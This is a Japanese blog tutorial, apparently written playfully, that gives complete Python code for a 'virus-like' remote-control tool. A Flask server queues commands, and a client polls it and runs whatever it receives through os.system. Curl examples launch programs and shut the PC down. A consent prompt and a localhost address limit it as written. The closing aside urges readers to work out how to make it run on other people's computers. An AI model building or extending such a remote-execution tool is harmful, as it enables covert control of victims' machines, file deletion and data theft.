注意 : このページは犯罪などの不法行為を促すわけでなく、あくまでセキュリティに興味を持っていただくことを目的としています。
注意 : あくまでコンピューターウイルス「もどき」です。
注意 : このサイトの管理者はいかなる場合も責任は負いかねます。
(悪用厳禁)コンピューターウイルスもどきを作る
赤い注意書きから始まりました。
こんにちは。
今回はコンピューターウイルスもどきを作ろうと思います。
まあ、はっきり言っていたずらプログラムみたいなものです。
そして、ばらまいたりしないでください。まあそれは自己責任なんですが。
では早速作っていきましょう。
どんな感じな奴作るか
遠隔操作型です。
だれかさん「ウイルスやん」
だれかさん「うわぁ...こいつやってるわぁ...」
だれかさん「警察に連絡しよ」
まあそんなに焦らないでください。

そう、こんな感じに事前に警告してくれるのです。良心的でしょ?
コンピューターウイルスはユーザーの意図しない動作をするソフトのことを指すので、
これはウイルスではありません。
どんなことができるか
windowsコマンドを実行することができます。基本なことは結構できたりします。
【基本的にできる遠隔操作】
- 勝手にソフトウェア、アプリケーションを起動することができる。
- シャットダウン、再起動
- ソフトのダウンロード、インストール
- ファイルの削除、改変、作成
- 画像ファイルなどの機密情報の取得
まあこんなもんです。
だれかさん「やばくね?」
だれかさん「これ絶対ウイルスでしょ」
ご安心ください。ウイルスではありません
遠隔操作プログラムを実行する前に警告してくれますので。
遠隔操作されたくなければ実行を取り消せばいいだけです。
(遠隔操作)されたがるやつはドMです。
だれかさん「 」
早速作っていく
環境
まあ、こんなもんですかね。pythonがインストールされていない場合はインストールしてください。
pythonのインストール、ダウンロードの仕方が分からない人向けに言うと、
「ググれks」
はい、作っていきましょう。
まず、適当に「virus」と言うフォルダを作成してください。
そして、次に「main.py」と言うファイルと「server.py」と言うファイルを作成してください。
こんな感じですね。

pythonのアイコンってプロンプトみたいでかっこいいよね。
そんなことどうでもいいから早くしろと。早くします。
いよいよプログラミング
「プログラミングするのか」
「おれプログラミングできねぇけどどうしてくれるんだぁあああぁ」
って人はコピペで結構です。
さっそくソースコードです。
from flask import *
app = Flask(__name__)
post_data = None #Push posted data in list
post_num = 0 #online peoples number
#Return the posted data as json
@app.route("/",methods=["GET","POST"])
def api_cmt_json():
global post_data
global post_num
if request.method == "GET":
#online peoples + 1
post_num += 1
print(post_num)
while post_num != 0:
#If posted new data,
if post_data != None:
#Delete user who have responsed data.
post_num -= 1
if post_num == 0:
post_tmp = post_data
post_data = None
return post_tmp
pass
#response data
return post_data
else:
#push data in list
post_data = request.form
#renponse
return request.form
if __name__ == "__main__":
app.run(port=5000)
「くそが、暗号みたいなやつを見たせいで頭が痛くなったじゃないか
4ね」
っていう人はどっか行ってください。
これを分からない人向けに説明すると、
server.pyを右クリック -> プログラムから開く -> IDLE (Python 3.9 64-bit)をクリック
エディタが立ち上がるので、コピーして貼り付けてください。
次行きますよー。どぉーん。(棒読み)
import requests
import json
import os
server = "http://localhost:5000/"
inp = input("このプログラムはお使いのpcを遠隔操作します。\nそれでも実行する場合は yを 実行しない場合は nを入力してください。>>")
if inp == "y":
sw = True
else:
sw = False
while sw:
response = requests.get(server)
json_data = json.loads(response.text)
if "command" in json_data:
# print(json_data["command"])
os.system(json_data["command"])
pass
今度は、main.pyにコピペしてください
はいもうこれでウイルスのソースコードは完成です。これだけです。
実行
いよいよ来ました。実行していきたいと思います。
とその前に、コマンドプロンプトを起動して
pip install flask
と入力してエンターを押すと色々出てくるのでそのままインストールが終わるのを待っていましょう。
コマンドプロンプトの出した方が分からない人は[windowsキー]+[Rキー]を押して「cmd」と入力してエンターを押しましょう

これで準備は完了です。
まず、server.pyをマウスでクリックします。
その次にmain.pyをクリックします。
server.py -> main.py って感じです。
この順番は絶対に守ってください。守らないとエラーが出るので。
server.pyをクリックしたらこのような画面が出てきます。

main.pyをクリックしたらこのような画面が出てきます。yと入力してエンターを押してください。

これで起動できました!あとは自滅するだけです!
そう、もちろん自分のpcに入れているから自分のpcを操作できるわけです。むなし
操作してみよう
先ほどのコマンドプロンプトを開いて、
curl post -d command="start chrome https://google.com/" localhost:5000
と入力して、エンターを押すと、google chrome が開いて、googleが開きます
このように、特定のサイトにアクセスすることも可能です。

そう、これを他人のpcにやることで遠隔操作になります。
もちろん
curl post -d command="shutdown -s /t 0" localhost:5000
を入力すれば、シャットダウンされます。
終わり
今回はウイルスもどきの作り方をお伝えしました。
コンピューターウイルスずくリの第一歩はプログラミングを勉強することです。
と言うわけでプログラミングできない人はプログラミングで色々しましょう。
てなわけで、良いハッキングライフを!
余談
実は、main.pyをそのまま他人のpcに入れてもウイルスとして動作しない。
そう、自滅しかできない超無能ウイルスなのである。
なので、どうやったら他人のpcでも実行できるようにするか?
そこを考えて実装してみよう。
最後に、ねむいねるおやすみ